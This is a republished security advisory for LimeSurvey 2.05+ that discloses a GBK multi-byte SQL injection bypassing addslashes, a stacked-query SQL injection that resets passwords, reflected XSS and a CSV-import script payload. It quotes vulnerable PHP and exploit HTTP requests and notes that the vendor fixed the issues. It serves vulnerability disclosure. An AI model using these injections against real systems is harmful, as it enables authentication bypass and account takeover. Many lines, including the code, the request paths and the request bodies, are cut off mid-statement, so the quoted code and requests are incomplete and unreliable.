==============================
[ADVISORY INFORMATION]
Title: Lime Survey Multiple Vulnerabilities
Discovery date: 02/07/2014
Release date: 03/07/2014
Vendor Homepage: www.limesurvey.org
Version: Lime Survey 2.05+ Build 140618
Tested with: MS SQL Server 2008
Credits: Giuseppe D'Amore (http://it.linkedin.com/pub/
[VULNERABILITY INFORMATION]
Class: SQL Injection + XSS
Category: Web
[AFFECTED PRODUCTS]
This security vulnerability affects:
* Lime Survey 2.05+ Build 140618
[VULNERABILITY DETAILS]
Multi-Byte SQL Injection
------------------------
As shown in frontend_helper.php:
******************************
function loadanswers()
{
global $surveyid;
global $thissurvey, $thisstep;
global $clienttoken;
$clang = Yii::app()->lang;
$scid=returnGlobal('scid',
if (Yii::app()->request->
{
$query = "SELECT * FROM {{saved_control}} INNER JOIN {$thissurvey['tablename']}
ON {{saved_control}}.srid = {$thissurvey['tablename']}.id
WHERE {{saved_control}}.sid=$
if (isset($scid)) //Would only come from email
{
$query .= "AND {{saved_control}}.scid={$scid}
}
$query .="AND {{saved_control}}.identifier = '".autoEscape($_SESSION['
******************************
the function autoEscape is applied on the holdname parameter, this function is defined in the file common_helper.php
******************************
function autoEscape($str) {
if (!get_magic_quotes_gpc()) {
return addslashes ($str);
}
return $str;
}
******************************
addslashes can be bypassed using the GBK charset. So sending this request:
******************************
POST /limesurvey/index.php?r=
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;
Accept-Encoding: gzip, deflate
Referer: http://localhost/limesurvey/
Cookie: PHPSESSID=
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 125
YII_CSRF_TOKEN=
******************************
it is possible to bypass imcomplete survey authentication.
Stacked Query SQL Injection
---------------------------
Sending this request:
******************************
POST /limesurvey/index.php?r=admin/
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-
X-Requested-With: XMLHttpRequest
Referer: http://localhost/limesurvey/
Content-Length: 141
Cookie: PHPSESSID=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
YII_CSRF_TOKEN=
******************************
it is possible to change the users's password.
Reflected XSS
-------------
GET /limesurvey/index.php?r=admin%
GET /limesurvey/index.php?r=admin/
XSS via CSV
-----------
it is possible to create a .csv file with inside <script>alert(2)</script>,0 and and upload it with the functionality "Import CSV".
[DISCLOSURE TIME-LINE]
* 02/07/2014 - Initial vendor contact.
* 02/07/2014 - Lime Survey Team confirmed the issue is a new security vulnerability.
* 02/07/2014 - Vendor has fixed this vulnerability on Git.
* 03/07/2014 - Public disclosure.
[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.
Komentarų nėra:
Rašyti komentarą